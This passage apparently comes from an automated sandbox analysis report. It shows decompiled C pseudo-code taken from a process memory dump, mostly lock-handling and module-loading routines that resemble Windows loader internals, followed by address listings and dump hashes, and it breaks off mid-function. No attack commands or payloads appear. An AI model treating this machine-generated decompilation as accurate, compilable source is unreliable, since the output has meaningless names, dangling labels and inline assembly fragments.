                        										goto L76;
                        									}
                        									_t73 = _t231 + 1; // 0x1
                        									_t210 = _t73;
                        									asm("lock cmpxchg [edi], ecx");
                        									__eflags = _t231 - _t231;
                        									if(_t231 != _t231) {
                        										L92:
                        										_t133 = E02BC6B90(_t210,  &_v64);
                        										_t262 =  *0x2c88608; // 0x0
                        										L93:
                        										_t231 = _t262;
                        										continue;
                        									}
                        									_t240 = _v56;
                        									goto L10;
                        									L76:
                        									_t169 = E02BCE180(_t133);
                        									__eflags = _t169;
                        									if(_t169 != 0) {
                        										_push(0xc000004b);
                        										_push(0xffffffff);
                        										E02BD97C0();
                        										_t231 = _v68;
                        									}
                        									_v72 = 0;
                        									_v24 =  *( *[fs:0x18] + 0x24);
                        									_v16 = 3;
                        									_v28 = 0;
                        									__eflags = _t231 & 0x00000002;
                        									if((_t231 & 0x00000002) == 0) {
                        										_v32 =  &_v36;
                        										_t174 = _t231 >> 4;
                        										__eflags = 1 - _t174;
                        										_v20 = _t174;
                        										asm("sbb ecx, ecx");
                        										_t210 = 3 |  &_v36;
                        										__eflags = _t174;
                        										if(_t174 == 0) {
                        											_v20 = 0xfffffffe;
                        										}
                        									} else {
                        										_v32 = 0;
                        										_v20 = 0xffffffff;
                        										_v36 = _t231 & 0xfffffff0;
                        										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                        										_v72 =  !(_t231 >> 2) & 0xffffff01;
                        									}
                        									asm("lock cmpxchg [edi], esi");
                        									_t262 = _t231;
                        									__eflags = _t262 - _t231;
                        									if(_t262 != _t231) {
                        										goto L92;
                        									} else {
                        										__eflags = _v72;
                        										if(_v72 != 0) {
                        											E02BD006A(0x2c88608, _t210);
                        										}
                        										__eflags =  *0x7ffe036a - 1;
                        										if(__eflags <= 0) {
                        											L89:
                        											_t133 =  &_v16;
                        											asm("lock btr dword [eax], 0x1");
                        											if(__eflags >= 0) {
                        												goto L93;
                        											} else {
                        												goto L90;
                        											}
                        											do {
                        												L90:
                        												_push(0);
                        												_push(0x2c88608);
                        												E02BDB180();
                        												_t133 = _v24;
                        												__eflags = _t133 & 0x00000004;
                        											} while ((_t133 & 0x00000004) == 0);
                        											goto L93;
                        										} else {
                        											_t218 =  *0x2c86904; // 0x400
                        											__eflags = _t218;
                        											if(__eflags == 0) {
                        												goto L89;
                        											} else {
                        												goto L87;
                        											}
                        											while(1) {
                        												L87:
                        												__eflags = _v16 & 0x00000002;
                        												if(__eflags == 0) {
                        													goto L89;
                        												}
                        												asm("pause");
                        												_t218 = _t218 - 1;
                        												__eflags = _t218;
                        												if(__eflags != 0) {
                        													continue;
                        												}
                        												goto L89;
                        											}
                        											goto L89;
                        										}
                        									}
                        								}
                        							}
                        							L10:
                        							_t229 =  *0x2c86e48; // 0x2734d28
                        							_v72 = _t229;
                        							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        								E02BAFFB0(_t198, _t240, 0x2c88608);
                        								_t253 = _v76;
                        								goto L29;
                        							} else {
                        								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                        								asm("lock cmpxchg [esi], ecx");
                        								_t215 = 1;
                        								if(1 != 1) {
                        									while(1) {
                        										_t246 = _t215 & 0x00000006;
                        										_t180 = _t215;
                        										__eflags = _t246 - 2;
                        										_v56 = _t246;
                        										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                        										asm("lock cmpxchg [edi], esi");
                        										_t248 = _v56;
                        										__eflags = _t180 - _t215;
                        										if(_t180 == _t215) {
                        											break;
                        										}
                        										_t215 = _t180;
                        									}
                        									__eflags = _t248 - 2;
                        									if(_t248 == 2) {
                        										__eflags = 0;
                        										E02BD00C2(0x2c88608, 0, _t235);
                        									}
                        									_t229 = _v72;
                        								}
                        								goto L14;
                        							}
                        						}
                        					}
                        				}
                        				_t227 = 0;
                        				_v75 = 0;
                        				if(_t128 != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}











































































                        0x02bc20a0
                        0x02bc20a8
                        0x02bc20ad
                        0x02bc20b3
                        0x02bc20b8
                        0x02bc20c2
                        0x02bc20c7
                        0x02bc20cb
                        0x02bc20d2
                        0x02bc2263
                        0x02bc2266
                        0x02c05836
                        0x02c05836
                        0x00000000
                        0x02bc226c
                        0x02bc226c
                        0x02bc2270
                        0x02bc2274
                        0x02bc20e2
                        0x02bc20e2
                        0x02bc20e6
                        0x02bc20ee
                        0x02c057dc
                        0x02c057de
                        0x02c057ec
                        0x02c057ec
                        0x02c057f1
                        0x02c057f3
                        0x02c057f8
                        0x00000000
                        0x02c057f8
                        0x02c057e0
                        0x02c057e4
                        0x02c057ea
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c057ea
                        0x02bc20f4
                        0x02bc20f4
                        0x02bc20f8
                        0x02bc20f8
                        0x02bc20fc
                        0x02bc2100
                        0x02bc2106
                        0x02bc2201
                        0x02bc2206
                        0x02bc220b
                        0x02bc220e
                        0x02bc22a9
                        0x02bc22ac
                        0x00000000
                        0x00000000
                        0x02bc22b2
                        0x02bc22b5
                        0x02c05801
                        0x02c05806
                        0x00000000
                        0x00000000
                        0x02c05810
                        0x02c05815
                        0x02c05818
                        0x00000000
                        0x00000000
                        0x02c0581e
                        0x02bc22bb
                        0x02bc22bb
                        0x02bc2218
                        0x02bc2218
                        0x02bc221c
                        0x02bc2220
                        0x02bc2222
                        0x02bc22c2
                        0x02bc22c4
                        0x02bc22dc
                        0x02bc22dc
                        0x02bc22e1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bc22e7
                        0x02bc22c8
                        0x02bc22cd
                        0x02bc22d3
                        0x02bc22d6
                        0x02c05823
                        0x02c05825
                        0x02c05827
                        0x00000000
                        0x00000000
                        0x02c0582d
                        0x00000000
                        0x02c0582d
                        0x00000000
                        0x02bc2228
                        0x02bc2228
                        0x00000000
                        0x02bc2228
                        0x02bc2222
                        0x02bc2214
                        0x02bc2214
                        0x00000000
                        0x02bc2114
                        0x02bc2114
                        0x02bc2114
                        0x02bc211a
                        0x02bc211c
                        0x02bc2348
                        0x02bc234d
                        0x02c05840
                        0x02c05845
                        0x02c05848
                        0x02c0584e
                        0x02c0584e
                        0x02c05848
                        0x02bc2353
                        0x02bc2355
                        0x02bc2388
                        0x02bc2388
                        0x02bc2368
                        0x02bc236a
                        0x02bc236c
                        0x02bc238f
                        0x00000000
                        0x02bc236e
                        0x02bc236e
                        0x02bc218e
                        0x02bc218e
                        0x02bc2191
                        0x02bc2195
                        0x02c05a03
                        0x02c05a06
                        0x02c05a0c
                        0x02c05a0f
                        0x02c05a11
                        0x02c05a13
                        0x02c05a13
                        0x02c05a19
                        0x02c05a1f
                        0x00000000
                        0x02bc219b
                        0x02bc219b
                        0x02bc21a0
                        0x02bc2282
                        0x02bc2284
                        0x02bc2284
                        0x02bc2284
                        0x02bc2284
                        0x02bc21a6
                        0x02bc21a9
                        0x02bc21ac
                        0x02bc21ae
                        0x02bc21b3
                        0x02bc228b
                        0x02bc2290
                        0x02bc2379
                        0x02bc2296
                        0x02bc2298
                        0x02bc2298
                        0x02bc2290
                        0x02bc21b9
                        0x02bc21be
                        0x02bc22a2
                        0x02bc22a2
                        0x02bc21c4
                        0x02bc21c8
                        0x02bc21cc
                        0x02bc21d0
                        0x02bc21d4
                        0x02bc21de
                        0x02bc21e3
                        0x02c05a29
                        0x02c05a2c
                        0x00000000
                        0x00000000
                        0x02c05a3b
                        0x00000000
                        0x02bc21e9
                        0x02bc21e9
                        0x02bc21e9
                        0x02bc21ee
                        0x02bc21f1
                        0x02c05a45
                        0x02c05a4b
                        0x02c05a52
                        0x02c05a58
                        0x02c05a5d
                        0x02c05a5f
                        0x02c05a71
                        0x02c05a61
                        0x02c05a6a
                        0x02c05a6a
                        0x02c05a76
                        0x02c05a79
                        0x02c05a7f
                        0x02c05a83
                        0x02c05a85
                        0x02c05a87
                        0x02c05a87
                        0x02c05a8c
                        0x02c05a91
                        0x02c05a97
                        0x02c05a9f
                        0x02c05aa0
                        0x02c05aa1
                        0x02c05aa6
                        0x02c05aab
                        0x02c05ab1
                        0x02c05ab3
                        0x02c05ab9
                        0x02c05aca
                        0x02c05ad4
                        0x02c05ad4
                        0x02c05ade
                        0x02c05ade
                        0x02c05aab
                        0x02c05a79
                        0x02c05a52
                        0x02bc21f7
                        0x02bc21f9
                        0x02bc21fe
                        0x02bc21fe
                        0x02bc21e3
                        0x02bc2195
                        0x02bc236c
                        0x02bc2122
                        0x02bc2122
                        0x02bc2124
                        0x02bc2231
                        0x02bc2236
                        0x02bc2236
                        0x02bc2238
                        0x02bc2238
                        0x02bc2240
                        0x02bc2242
                        0x02bc2244
                        0x02c059fc
                        0x02bc218c
                        0x02bc218c
                        0x00000000
                        0x02bc218c
                        0x02bc224a
                        0x02bc224f
                        0x02bc2256
                        0x02bc2304
                        0x02bc2309
                        0x02bc230f
                        0x02bc231e
                        0x02bc231e
                        0x02bc231e
                        0x02bc2320
                        0x02bc2325
                        0x02bc232a
                        0x02bc232c
                        0x02bc233e
                        0x02bc233e
                        0x00000000
                        0x02bc232c
                        0x02bc2311
                        0x02bc2317
                        0x02bc231a
                        0x02bc231c
                        0x02bc2380
                        0x02bc2380
                        0x02bc2380
                        0x02bc2384
                        0x00000000
                        0x00000000
                        0x02bc2386
                        0x00000000
                        0x02bc231c
                        0x02bc225c
                        0x02bc225c
                        0x00000000
                        0x02bc225c
                        0x02bc212a
                        0x02bc2134
                        0x02bc2138
                        0x02bc213d
                        0x02c05858
                        0x02c05863
                        0x02c05863
                        0x02c05867
                        0x02c0586a
                        0x00000000
                        0x00000000
                        0x02c0586c
                        0x02c0586c
                        0x02c05871
                        0x02c05875
                        0x02c05877
                        0x02c05997
                        0x02c0599c
                        0x02c059a1
                        0x02c059a7
                        0x02c059a7
                        0x00000000
                        0x02c059a7
                        0x02c0587d
                        0x00000000
                        0x02c0588b
                        0x02c0588b
                        0x02c05890
                        0x02c05892
                        0x02c05894
                        0x02c05899
                        0x02c0589b
                        0x02c058a0
                        0x02c058a0
                        0x02c058aa
                        0x02c058b2
                        0x02c058b6
                        0x02c058be
                        0x02c058c6
                        0x02c058c9
                        0x02c0590d
                        0x02c05917
                        0x02c0591a
                        0x02c0591c
                        0x02c05920
                        0x02c05928
                        0x02c0592a
                        0x02c0592c
                        0x02c0592e
                        0x02c0592e
                        0x02c058cb
                        0x02c058cd
                        0x02c058d8
                        0x02c058e0
                        0x02c058f4
                        0x02c058fe
                        0x02c058fe
                        0x02c0593a
                        0x02c0593e
                        0x02c05940
                        0x02c05942
                        0x00000000
                        0x02c05944
                        0x02c05944
                        0x02c05949
                        0x02c0594e
                        0x02c0594e
                        0x02c05953
                        0x02c0595b
                        0x02c05976
                        0x02c05976
                        0x02c0597a
                        0x02c0597f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c05981
                        0x02c05981
                        0x02c05981
                        0x02c05983
                        0x02c05988
                        0x02c0598d
                        0x02c05991
                        0x02c05991
                        0x00000000
                        0x02c0595d
                        0x02c0595d
                        0x02c05963
                        0x02c05965
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c05967
                        0x02c05967
                        0x02c0596b
                        0x02c0596d
                        0x00000000
                        0x00000000
                        0x02c0596f
                        0x02c05971
                        0x02c05971
                        0x02c05974
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c05974
                        0x00000000
                        0x02c05967
                        0x02c0595b
                        0x02c05942
                        0x02c05863
                        0x02bc2143
                        0x02bc2143
                        0x02bc2149
                        0x02bc214f
                        0x02bc22f1
                        0x02bc22f6
                        0x00000000
                        0x02bc2173
                        0x02bc2173
                        0x02bc217d
                        0x02bc2181
                        0x02bc2186
                        0x02c059ae
                        0x02c059b2
                        0x02c059b5
                        0x02c059b7
                        0x02c059ba
                        0x02c059cd
                        0x02c059d1
                        0x02c059d5
                        0x02c059d9
                        0x02c059db
                        0x00000000
                        0x00000000
                        0x02c059dd
                        0x02c059dd
                        0x02c059e1
                        0x02c059e4
                        0x02c059e7
                        0x02c059ee
                        0x02c059ee
                        0x02c059f3
                        0x02c059f3
                        0x00000000
                        0x02bc2186
                        0x02bc214f
                        0x02bc2106
                        0x02bc2266
                        0x02bc20d8
                        0x02bc20da
                        0x02bc20e0
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 44f93c06d845a0cd575cdfac08ac186da6a85e72f9a41e52a181e64d0354b392
                        • Instruction ID: af355fdb8ef442fab6057ec650123873a27ff8d2bdc7e00395035b2f18a81023
                        • Opcode Fuzzy Hash: 44f93c06d845a0cd575cdfac08ac186da6a85e72f9a41e52a181e64d0354b392
                        • Instruction Fuzzy Hash: 5AF1D171A083419FDB25CB28C88076A77E6BFC5364F648AADEC959B380D735D841CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E02BAD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				signed int _v36;
                        				intOrPtr* _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed char _v52;
                        				signed int _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				intOrPtr _v80;
                        				signed int _v84;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				signed int _v108;
                        				signed int _v112;
                        				signed int _v116;
                        				intOrPtr _v120;
                        				signed int _v132;
                        				char _v140;
                        				char _v144;
                        				char _v157;
                        				signed int _v164;
                        				signed int _v168;
                        				signed int _v169;
                        				intOrPtr _v176;
                        				signed int _v180;
                        				signed int _v184;
                        				intOrPtr _v188;
                        				signed int _v192;
                        				signed int _v200;
                        				signed int _v208;
                        				intOrPtr* _v212;
                        				char _v216;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t204;
                        				signed int _t206;
                        				void* _t208;
                        				signed int _t211;
                        				signed int _t216;
                        				intOrPtr _t217;
                        				intOrPtr* _t218;
                        				signed int _t226;
                        				signed int _t239;
                        				signed int* _t247;
                        				signed int _t249;
                        				void* _t252;
                        				signed int _t256;
                        				signed int _t269;
                        				signed int _t271;
                        				signed int _t277;
                        				signed int _t279;
                        				intOrPtr _t283;
                        				signed int _t287;
                        				signed int _t288;
                        				void* _t289;
                        				signed char _t290;
                        				signed int _t292;
                        				signed int* _t293;
                        				unsigned int _t297;
                        				signed int _t306;
                        				signed int _t307;
                        				signed int _t308;
                        				signed int _t309;
                        				signed int _t310;
                        				intOrPtr _t311;
                        				intOrPtr _t312;
                        				signed int _t319;
                        				signed int _t320;
                        				signed int* _t324;
                        				signed int _t337;
                        				signed int _t338;
                        				signed int _t339;
                        				signed int* _t340;
                        				void* _t341;
                        				signed int _t344;
                        				signed int _t348;
                        				signed int _t349;
                        				signed int _t351;
                        				intOrPtr _t353;
                        				void* _t354;
                        				signed int _t356;
                        				signed int _t358;
                        				intOrPtr _t359;
                        				signed int _t361;
                        				signed int _t363;
                        				signed short* _t365;
                        				void* _t367;
                        				intOrPtr _t369;
                        				void* _t370;
                        				signed int _t371;
                        				signed int _t372;
                        				void* _t374;
                        				signed int _t376;
                        				void* _t384;
                        				signed int _t387;
                        
                        				_v8 =  *0x2c8d360 ^ _t376;
                        				_t2 =  &_a20;
                        				 *_t2 = _a20 & 0x00000001;
                        				_t287 = _a4;
                        				_v200 = _a12;
                        				_t365 = _a8;
                        				_v212 = _a16;
                        				_v180 = _a24;
                        				_v168 = 0;
                        				_v157 = 0;
                        				if( *_t2 != 0) {
                        					__eflags = E02BA6600(0x2c852d8);
                        					if(__eflags == 0) {
                        						goto L1;
                        					} else {
                        						_v188 = 6;
                        					}
                        				} else {
                        					L1:
                        					_v188 = 9;
                        				}
                        				if(_t365 == 0) {
                        					_v164 = 0;
                        					goto L5;
                        				} else {
                        					_t363 =  *_t365 & 0x0000ffff;
                        					_t341 = _t363 + 1;
                        					if((_t365[1] & 0x0000ffff) < _t341) {
                        						L109:
                        						__eflags = _t341 - 0x80;
                        						if(_t341 <= 0x80) {
                        							_t281 =  &_v140;
                        							_v164 =  &_v140;
                        							goto L114;
                        						} else {
                        							_t283 =  *0x2c87b9c; // 0x0
                        							_t281 = L02BB4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                        							_v164 = _t281;
                        							__eflags = _t281;
                        							if(_t281 != 0) {
                        								_v157 = 1;
                        								L114:
                        								E02BDF3E0(_t281, _t365[2], _t363);
                        								_t200 = _v164;
                        								 *((char*)(_v164 + _t363)) = 0;
                        								goto L5;
                        							} else {
                        								_t204 = 0xc000009a;
                        								goto L47;
                        							}
                        						}
                        					} else {
                        						_t200 = _t365[2];
                        						_v164 = _t200;
                        						if( *((char*)(_t200 + _t363)) != 0) {
                        							goto L109;
                        						} else {
                        							while(1) {
                        								L5:
                        								_t353 = 0;
                        								_t342 = 0x1000;
                        								_v176 = 0;
                        								if(_t287 == 0) {
                        									break;
                        								}
                        								_t384 = _t287 -  *0x2c87b90; // 0x779c0000
                        								if(_t384 == 0) {
                        									_t353 =  *0x2c87b8c; // 0x2732a08
                        									_v176 = _t353;
                        									_t320 = ( *(_t353 + 0x50))[8];
                        									_v184 = _t320;
                        								} else {
                        									E02BB2280(_t200, 0x2c884d8);
                        									_t277 =  *0x2c885f4; // 0x2732ef8
                        									_t351 =  *0x2c885f8 & 1;
                        									while(_t277 != 0) {
                        										_t337 =  *(_t277 - 0x50);
                        										if(_t337 > _t287) {
                        											_t338 = _t337 | 0xffffffff;
                        										} else {
                        											asm("sbb ecx, ecx");
                        											_t338 =  ~_t337;
                        										}
                        										_t387 = _t338;
                        										if(_t387 < 0) {
                        											_t339 =  *_t277;
                        											__eflags = _t351;
                        											if(_t351 != 0) {
                        												__eflags = _t339;
                        												if(_t339 == 0) {
                        													goto L16;
                        												} else {
                        													goto L118;
                        												}
                        												goto L151;
                        											} else {
                        												goto L16;
                        											}
                        											goto L17;
                        										} else {
                        											if(_t387 <= 0) {
                        												__eflags = _t277;
                        												if(_t277 != 0) {
                        													_t340 =  *(_t277 - 0x18);
                        													_t24 = _t277 - 0x68; // 0x2732e90
                        													_t353 = _t24;
                        													_v176 = _t353;
                        													__eflags = _t340[3] - 0xffffffff;
                        													if(_t340[3] != 0xffffffff) {
                        														_t279 =  *_t340;
                        														__eflags =  *(_t279 - 0x20) & 0x00000020;
                        														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                        															asm("lock inc dword [edi+0x9c]");
                        															_t340 =  *(_t353 + 0x50);
                        														}
                        													}
                        													_v184 = _t340[8];
                        												}
                        											} else {
                        												_t339 =  *(_t277 + 4);
                        												if(_t351 != 0) {
                        													__eflags = _t339;
                        													if(_t339 == 0) {
                        														goto L16;
                        													} else {
                        														L118:
                        														_t277 = _t277 ^ _t339;
                        														goto L17;
                        													}
                        													goto L151;
                        												} else {
                        													L16:
                        													_t277 = _t339;
                        												}
                        												goto L17;
                        											}
                        										}
                        										goto L25;
                        										L17:
                        									}
                        									L25:
                        									E02BAFFB0(_t287, _t353, 0x2c884d8);
                        									_t320 = _v184;
                        									_t342 = 0x1000;
                        								}
                        								if(_t353 == 0) {
                        									break;
                        								} else {
                        									_t366 = 0;
                        									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                        										_t288 = _v164;
                        										if(_t353 != 0) {
                        											_t342 = _t288;
                        											_t374 = E02BECC99(_t353, _t288, _v200, 1,  &_v168);
                        											if(_t374 >= 0) {
                        												if(_v184 == 7) {
                        													__eflags = _a20;
                        													if(__eflags == 0) {
                        														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                        														if(__eflags != 0) {
                        															_t271 = E02BA6600(0x2c852d8);
                        															__eflags = _t271;
                        															if(__eflags == 0) {
                        																_t342 = 0;
                        																_v169 = _t271;
                        																_t374 = E02BA7926( *(_t353 + 0x50), 0,  &_v169);
                        															}
                        														}
                        													}
                        												}
                        												if(_t374 < 0) {
                        													_v168 = 0;
                        												} else {
                        													if( *0x2c8b239 != 0) {
                        														_t342 =  *(_t353 + 0x18);
                        														E02C1E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                        													}
                        													if( *0x2c88472 != 0) {
                        														_v192 = 0;
                        														_t342 =  *0x7ffe0330;
                        														_t361 =  *0x2c8b218; // 0x0
                        														asm("ror edi, cl");
                        														 *0x2c8b1e0( &_v192, _t353, _v168, 0, _v180);
                        														 *(_t361 ^  *0x7ffe0330)();
                        														_t269 = _v192;
                        														_t353 = _v176;
                        														__eflags = _t269;
                        														if(__eflags != 0) {
                        															_v168 = _t269;
                        														}
                        													}
                        												}
                        											}
                        											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                        												_t366 = 0xc000007a;
                        											}
                        											_t247 =  *(_t353 + 0x50);
                        											if(_t247[3] == 0xffffffff) {
                        												L40:
                        												if(_t366 == 0xc000007a) {
                        													__eflags = _t288;
                        													if(_t288 == 0) {
                        														goto L136;
                        													} else {
                        														_t366 = 0xc0000139;
                        													}
                        													goto L54;
                        												}
                        											} else {
                        												_t249 =  *_t247;
                        												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                        													goto L40;
                        												} else {
                        													_t250 = _t249 | 0xffffffff;
                        													asm("lock xadd [edi+0x9c], eax");
                        													if((_t249 | 0xffffffff) == 0) {
                        														E02BB2280(_t250, 0x2c884d8);
                        														_t342 =  *(_t353 + 0x54);
                        														_t165 = _t353 + 0x54; // 0x54
                        														_t252 = _t165;
                        														__eflags =  *(_t342 + 4) - _t252;
                        														if( *(_t342 + 4) != _t252) {
                        															L135:
                        															asm("int 0x29");
                        															L136:
                        															_t288 = _v200;
                        															_t366 = 0xc0000138;
                        															L54:
                        															_t342 = _t288;
                        															L02BD3898(0, _t288, _t366);
                        														} else {
                        															_t324 =  *(_t252 + 4);
                        															__eflags =  *_t324 - _t252;
                        															if( *_t324 != _t252) {
                        																goto L135;
                        															} else {
                        																 *_t324 = _t342;
                        																 *(_t342 + 4) = _t324;
                        																_t293 =  *(_t353 + 0x50);
                        																_v180 =  *_t293;
                        																E02BAFFB0(_t293, _t353, 0x2c884d8);
                        																__eflags =  *((short*)(_t353 + 0x3a));
                        																if( *((short*)(_t353 + 0x3a)) != 0) {
                        																	_t342 = 0;
                        																	__eflags = 0;
                        																	E02BD37F5(_t353, 0);
                        																}
                        																E02BD0413(_t353);
                        																_t256 =  *(_t353 + 0x48);
                        																__eflags = _t256;
                        																if(_t256 != 0) {
                        																	__eflags = _t256 - 0xffffffff;
                        																	if(_t256 != 0xffffffff) {
                        																		E02BC9B10(_t256);
                        																	}
                        																}
                        																__eflags =  *(_t353 + 0x28);
                        																if( *(_t353 + 0x28) != 0) {
                        																	_t174 = _t353 + 0x24; // 0x24
                        																	E02BC02D6(_t174);
                        																}
                        																L02BB77F0( *0x2c87b98, 0, _t353);
                        																__eflags = _v180 - _t293;
                        																if(__eflags == 0) {
                        																	E02BCC277(_t293, _t366);
                        																}
                        																_t288 = _v164;
                        																goto L40;
                        															}
                        														}
                        													} else {
                        														goto L40;
                        													}
                        												}
                        											}
                        										}
                        									} else {
                        										L02BAEC7F(_t353);
                        										L02BC19B8(_t287, 0, _t353, 0);
                        										_t200 = E02B9F4E3(__eflags);
                        										continue;
                        									}
                        								}
                        								L41:
                        								if(_v157 != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                        								}
                        								if(_t366 < 0) {
                        									L46:
                        									 *_v212 = _v168;
                        									_t204 = _t366;
                        									L47:
                        									_pop(_t354);
                        									_pop(_t367);
                        									_pop(_t289);
                        									return E02BDB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                        								} else {
                        									_t206 =  *0x2c8b2f8; // 0x210000
                        									if((_t206 |  *0x2c8b2fc) == 0 || ( *0x2c8b2e4 & 0x00000001) != 0) {
                        										goto L46;
                        									} else {
                        										_t297 =  *0x2c8b2ec; // 0x100
                        										_v200 = 0;
                        										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                        											_t355 = _v168;
                        											_t342 =  &_v208;
                        											_t208 = E02C46B68(_v168,  &_v208, _v168, __eflags);
                        											__eflags = _t208 - 1;
                        											if(_t208 == 1) {
                        												goto L46;
                        											} else {
                        												__eflags = _v208 & 0x00000010;
                        												if((_v208 & 0x00000010) == 0) {
                        													goto L46;
                        												} else {
                        													_t342 = 4;
                        													_t366 = E02C46AEB(_t355, 4,  &_v216);
                        													__eflags = _t366;
                        													if(_t366 >= 0) {
                        														goto L46;
                        													} else {
                        														asm("int 0x29");
                        														_t356 = 0;
                        														_v44 = 0;
                        														_t290 = _v52;
                        														__eflags = 0;
                        														if(0 == 0) {
                        															L108:
                        															_t356 = 0;
                        															_v44 = 0;
                        															goto L63;
                        														} else {
                        															__eflags = 0;
                        															if(0 < 0) {
                        																goto L108;
                        															}
                        															L63:
                        															_v112 = _t356;
                        															__eflags = _t356;
                        															if(_t356 == 0) {
                        																L143:
                        																_v8 = 0xfffffffe;
                        																_t211 = 0xc0000089;
                        															} else {
                        																_v36 = 0;
                        																_v60 = 0;
                        																_v48 = 0;
                        																_v68 = 0;
                        																_v44 = _t290 & 0xfffffffc;
                        																E02BAE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                        																_t306 = _v68;
                        																__eflags = _t306;
                        																if(_t306 == 0) {
                        																	_t216 = 0xc000007b;
                        																	_v36 = 0xc000007b;
                        																	_t307 = _v60;
                        																} else {
                        																	__eflags = _t290 & 0x00000001;
                        																	if(__eflags == 0) {
                        																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                        																		__eflags = _t349 - 0x10b;
                        																		if(_t349 != 0x10b) {
                        																			__eflags = _t349 - 0x20b;
                        																			if(_t349 == 0x20b) {
                        																				goto L102;
                        																			} else {
                        																				_t307 = 0;
                        																				_v48 = 0;
                        																				_t216 = 0xc000007b;
                        																				_v36 = 0xc000007b;
                        																				goto L71;
                        																			}
                        																		} else {
                        																			L102:
                        																			_t307 =  *(_t306 + 0x50);
                        																			goto L69;
                        																		}
                        																		goto L151;
                        																	} else {
                        																		_t239 = L02BAEAEA(_t290, _t290, _t356, _t366, __eflags);
                        																		_t307 = _t239;
                        																		_v60 = _t307;
                        																		_v48 = _t307;
                        																		__eflags = _t307;
                        																		if(_t307 != 0) {
                        																			L70:
                        																			_t216 = _v36;
                        																		} else {
                        																			_push(_t239);
                        																			_push(0x14);
                        																			_push( &_v144);
                        																			_push(3);
                        																			_push(_v44);
                        																			_push(0xffffffff);
                        																			_t319 = E02BD9730();
                        																			_v36 = _t319;
                        																			__eflags = _t319;
                        																			if(_t319 < 0) {
                        																				_t216 = 0xc000001f;
                        																				_v36 = 0xc000001f;
                        																				_t307 = _v60;
                        																			} else {
                        																				_t307 = _v132;
                        																				L69:
                        																				_v48 = _t307;
                        																				goto L70;
                        																			}
                        																		}
                        																	}
                        																}
                        																L71:
                        																_v72 = _t307;
                        																_v84 = _t216;
                        																__eflags = _t216 - 0xc000007b;
                        																if(_t216 == 0xc000007b) {
                        																	L150:
                        																	_v8 = 0xfffffffe;
                        																	_t211 = 0xc000007b;
                        																} else {
                        																	_t344 = _t290 & 0xfffffffc;
                        																	_v76 = _t344;
                        																	__eflags = _v40 - _t344;
                        																	if(_v40 <= _t344) {
                        																		goto L150;
                        																	} else {
                        																		__eflags = _t307;
                        																		if(_t307 == 0) {
                        																			L75:
                        																			_t217 = 0;
                        																			_v104 = 0;
                        																			__eflags = _t366;
                        																			if(_t366 != 0) {
                        																				__eflags = _t290 & 0x00000001;
                        																				if((_t290 & 0x00000001) != 0) {
                        																					_t217 = 1;
                        																					_v104 = 1;
                        																				}
                        																				_t290 = _v44;
                        																				_v52 = _t290;
                        																			}
                        																			__eflags = _t217 - 1;
                        																			if(_t217 != 1) {
                        																				_t369 = 0;
                        																				_t218 = _v40;
                        																				goto L91;
                        																			} else {
                        																				_v64 = 0;
                        																				E02BAE9C0(1, _t290, 0, 0,  &_v64);
                        																				_t309 = _v64;
                        																				_v108 = _t309;
                        																				__eflags = _t309;
                        																				if(_t309 == 0) {
                        																					goto L143;
                        																				} else {
                        																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                        																					__eflags = _t226 - 0x10b;
                        																					if(_t226 != 0x10b) {
                        																						__eflags = _t226 - 0x20b;
                        																						if(_t226 != 0x20b) {
                        																							goto L143;
                        																						} else {
                        																							_t371 =  *(_t309 + 0x98);
                        																							goto L83;
                        																						}
                        																					} else {
                        																						_t371 =  *(_t309 + 0x88);
                        																						L83:
                        																						__eflags = _t371;
                        																						if(_t371 != 0) {
                        																							_v80 = _t371 - _t356 + _t290;
                        																							_t310 = _v64;
                        																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                        																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                        																							_t311 = 0;
                        																							__eflags = 0;
                        																							while(1) {
                        																								_v120 = _t311;
                        																								_v116 = _t348;
                        																								__eflags = _t311 - _t292;
